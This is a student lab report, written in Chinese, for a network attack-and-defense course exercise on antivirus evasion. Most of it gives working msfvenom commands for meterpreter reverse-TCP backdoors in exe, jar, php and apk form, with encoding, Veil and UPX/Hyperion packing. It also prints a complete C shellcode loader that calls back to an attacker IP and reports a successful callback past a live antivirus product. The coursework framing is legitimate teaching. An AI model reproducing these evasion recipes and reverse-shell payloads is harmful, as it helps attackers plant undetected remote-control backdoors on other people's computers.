2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践

目录
  • 2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践
    • 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
      • 正确使用msf编码器
      • msfvenom生成jar文件
      • msfvenom生成php文件
      • msfvenom生成apk文件
      • veil
      • 使用C + shellcode编程
      • 加壳工具
      • 使用其他课堂未介绍方法
    • 2.通过组合应用各种技术实现恶意代码免杀
    • 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
    • 实验总结
      • 1.实验中遇到的问题
      • 2.基础问题回答
      • 3.实践总结与体会
      • 4.开启杀软能绝对防止电脑中恶意代码吗?

1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

正确使用msf编码器
  • 使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门,更多的参数可以参考msfvenom一些基本用法
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第1张图片

  • 对实验二生成的20175216_backdoor.exe后门程序用VirusTotal进行扫描,结果如下图所示:
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第2张图片

  • 对实验二生成的20175216_backdoor.exe后门程序,用virscan进行扫描,扫了两次结果不一样,一次为危险,另一次为提醒(总感觉这杀软网站差点意思)扫描结果如下图所示:
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第3张图片

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第4张图片

  • 使用msf编码器对后门程序进行一次到多次的编码,并进行检测。
  • 一次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded.exe(LHOST=Attacker's IP ,使用-p 来指定要使用的payload,使用-b选项设定了规避字符集,会自动调用编码器,使用-f 来指定payload的输出格式)

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第5张图片

  • 对生成的zxy-encoded.exe后门程序,使用VirusTotal进行扫描,扫描结果如下图所示:
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第6张图片

  • 十次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.170.142 LPORT=5216 -f exe > zxy-encoded10.exe进行10次编码降低被查杀概率

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第7张图片

  • 对生成的zxy-encoded10.exe后门程序,使用VirusTotal进行扫描,扫描结果如下图所示:
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第8张图片
msfvenom生成jar文件
  • msf生成jar文件msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 x> zxy_backdoor_java.jar
    2.5.PNG

    • 对生成的zxy_backdoor_java.jar后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
      2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第9张图片
msfvenom生成php文件
  • msf生成php文件msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.php
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第10张图片
  • 对生成的zxy_backdoor.php后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第11张图片
msfvenom生成apk文件
  • msf生成apk文件msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.170.142 lport=5216 x> zxy_backdoor.apk
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第12张图片
  • 对生成的zxy_backdoor.apk后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第13张图片
veil
  • 1、安装过程
  • 更换镜像源,更换阿里云镜像源和中科大镜像源都可以,我选择的阿里云的镜像源具体,可以参考kali linux 更换镜像源
  • 安装以下软件
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32
sudo apt-get update
  • 安装veil
sudo apt-get install veil-evasion
  • 选择输入s,安装时默认选择提示选项
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第14张图片

  • 2、使用veil生成后门文件

  • 安装成功,veil 指令进入界面
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第15张图片

  • 可以输入指令use 1使用veil-evasion
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第16张图片

  • 输入指令list
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第17张图片

  • 输入命令use 22进入配置界面
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第18张图片

  • 设置端口号和IP地址

set LHOST 192.168.170.142//设置反弹连接IP
set LPORT 5216//设置端口

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第19张图片

  • 输入generate生成文件,接着输入你想要payload的名字:veil_ps_5216,文件保存路径为:/var/lib/veil/output/source/veil_ps_5216.bat
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第20张图片

  • 对生成的veil_ps_5216.bat后门文件,使用VirusTotal进行扫描,扫描结果如下图所示,和原来也差不多
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第21张图片

  • 生成一个veil_py_5216.py文件(和上述步骤一样),使用VirusTotal进行扫描,扫描结果如下图所示,检出率比上面检测的所有文件都要低,看来不同的文件类型,检出率也不一样
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第22张图片

使用C + shellcode编程
  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c生成shellcode
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第23张图片

  • 新建20175216.c

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xaa\x8e"
"\x68\x02\x00\x14\x60\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}
  • 使用mingw-w32将c语言文件生成exe文件i686-w64-mingw32-g++ 20175216.c -o 20175216.exe

2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第24张图片

  • 对创建的20175216.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第25张图片

  • 然后把文件放到win10运行下试试,反正觉得肯定不行,这要行的话,我都害怕
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第26张图片

加壳工具
  • 给之前的生成的文件进行加壳操作,压缩壳upx进行加壳,指令为upx 20175216.exe -o 20175216_upx.exe
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第27张图片
  • 对创建的20175216_upx.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第28张图片
  • 加密壳(Hyperion)进行加壳,将加壳的文件复制到/usr/share/windows-resources/hyperion/中,输入命令wine hyperion.exe -v 20175216_upx.exe 20175216_hyperion_upx.exe
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第29张图片

8.5.PNG
对创建的20175216_hyperion_upx.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示,加壳之后检出率更高了
2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第30张图片

使用其他课堂未介绍方法
  • 强制类型转换+shellcode
  • 输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.142 LPORT=5216 -f c获取shellcode
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第31张图片
  • 新建zxy5216.c
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第32张图片
  • 使用mingw-w32将c语言文件生成exe文件i686-w64-mingw32-g++ zxy5216.c -o zxy5216.exe
    11.3PNG.PNG
  • 对创建的zxy5216.exe后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第33张图片

2.通过组合应用各种技术实现恶意代码免杀

  • 使用工具shellcode_launcher
  • 先用Msfvenom生成raw格式的shellcode msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.170.142 lport=5216 -f raw -o zxy5216.raw
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第34张图片
  • msfconsole开始监听
  • shellcode_launcher-master文件打开cmd,运行指令shellcode_launcher.exe -i zxy5216.raw
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第35张图片
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第36张图片
    对创建的zxy5216.raw后门文件,使用VirusTotal进行扫描,扫描结果如下图所示
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第37张图片
    真的没想到这个检出率真么低,用杀毒软件扫也没发生风险
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第38张图片

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

电脑系统windows7 6.1.7601
杀软名称:腾讯电脑管家 13.5.20525.234
2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第39张图片
2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第40张图片
2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第41张图片

实验总结

1.实验中遇到的问题
  • 无法定位软件包
    2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践_第42张图片
  • 更换镜像源,kali自带镜像源很多都不支持,建议更换阿里云。可以参考kali linux 更换镜像源
2.基础问题回答

(1)杀软是如何检测出恶意代码的?
1、一个可执行文件中如果包含特征码,即可执行文件中有一段或多段可疑数据如shellcode之类的,杀软就认为这是恶意代码。
2、一个程序如果有特征码且有未经授权的非法动作时,杀软检测为恶意代码。
(2)免杀是做什么?
免杀能够让恶意代码躲过杀软的检测对攻击机进行非法操作,达到自己攻击目的。
(3)免杀的基本方法有哪些?
1、改变特征码,如加壳、c语言调用shellcode
2、改变行为,尽量使用反弹式连接、减少对系统的修改

3.实践总结与体会

通过这次免杀实验,我看到了杀毒软件也有局限性,有些程序有风险,杀毒软件可能只是提示有风险,让你自己来决定要不要用这个程序,这个时候最好还是慎重一些,十有八九是木马,但有的时候也不是。
做实验的时候用了很多的方法,像加壳、veil等方法,都没实现免杀,但有些放在电脑里只要不运行,杀软也没杀出来,但只要运行,要么提示有风险,要么直接就给杀掉了,人家那些杀毒软件设计者肯定也都学过这些,所以,实现免杀还是要费一番大功夫的。

4.开启杀软能绝对防止电脑中恶意代码吗?

开启杀软不能绝对防止电脑中恶意代码,但相对可以降低电脑中恶意代码的概率,目前杀毒软件已经很完善了,毕竟都是大公司设计的软件,经过了无数次的升级,对电脑的保护已经特别到位。

你可能感兴趣的:(2019-2020-2 20175216 《网络对抗技术》Exp3 免杀原理与实践)